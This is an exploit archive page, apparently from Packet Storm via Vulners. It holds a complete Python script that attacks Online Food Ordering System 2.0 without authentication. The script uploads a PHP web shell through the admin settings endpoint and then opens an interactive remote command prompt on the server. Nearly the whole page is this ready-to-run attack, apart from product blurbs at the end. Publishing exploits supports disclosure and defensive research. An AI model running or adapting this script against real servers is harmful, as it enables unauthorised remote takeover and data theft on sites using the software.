Lucene search
K

Online Food Ordering System 2.0 Shell Upload

🗓️ 20 Sep 2021 00:00:00Reported by Abdullah KhawajaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 242 Views

Online Food Ordering System 2.0 - Unauthenticated Remote Code Execution, Shell Uploa

Code
`# Exploit Title: Online Food Ordering System 2.0 - Unauthenticated Remote Code Execution  
# Exploit Author: Abdullah Khawaja (hax.3xploit)  
# Date: 2021-09-19  
# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip  
# Version: 2.0  
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4  
# Description: Online Food Ordering System 2.0 - Unauthenticated Remote Code Execution  
  
#Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py  
#Step 2: Input the URL of the vulnerable application: Example: http://192.168.10.6/fos/  
  
  
import requests, sys, urllib, re  
import datetime  
from colorama import Fore, Back, Style  
  
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  
  
  
  
  
  
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL  
  
print(Style.BRIGHT+" Online Food Ordering System v2.0")  
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)  
print(header)  
  
print(r"""  
______ _______ ________   
___ //_/__ /_______ ___ _______ ______(_)_____ _  
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/  
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /   
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/   
/___/   
abdullahkhawaja.com  
""")  
  
  
  
GREEN = '\033[32m' # Green Text  
RED = '\033[31m' # Red Text  
RESET = '\033[m' # reset to the defaults  
#Create a new session  
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}  
  
  
  
s = requests.Session()   
  
  
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}   
#Set Cookie  
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}  
  
LINK=input("Enter URL of The Vulnarable Application : ")  
  
  
def webshell(LINK, session):  
try:  
WEB_SHELL = LINK+'/assets/img/'+filename  
getdir = {'cmd': 'echo %CD%'}  
r2 = session.get(WEB_SHELL, params=getdir, verify=False)  
status = r2.status_code  
if status != 200:  
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)  
r2.raise_for_status()  
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')  
cwd = re.findall('[CDEF].*', r2.text)  
cwd = cwd[0]+"> "  
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET  
while True:  
thought = input(term)  
command = {'cmd': thought}  
r2 = requests.get(WEB_SHELL, params=command, verify=False)  
status = r2.status_code  
if status != 200:  
r2.raise_for_status()  
response2 = r2.text  
print(response2)  
except:  
print("\r\nExiting.")  
sys.exit(-1)  
  
  
#Creating a PHP Web Shell  
  
phpshell = {  
'img':   
(  
'shell.php',   
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',   
'application/octet-stream',   
{'Content-Disposition': 'form-data'}  
)   
}  
  
# Defining value for form data  
data = {'name':'test', 'email':'[email protected]', 'contact':'+6948 8542 623','about':'hello world'}  
  
  
def id_generator():  
x = datetime.datetime.now()  
date_string = x.strftime("%y-%m-%d %H:%M")  
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")  
timestamp = datetime.datetime.timestamp(date)  
file = int(timestamp)  
final_name = str(file)+'_shell.php'  
return final_name  
  
filename = id_generator()  
#Uploading Reverse Shell  
print("[*]Uploading PHP Shell For RCE...")  
upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data)  
  
shell_upload = True if("1" in upload.text) else False  
u=shell_upload  
if u:  
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)  
else:  
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)  
  
  
  
#Executing The Webshell  
webshell(LINK, s)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation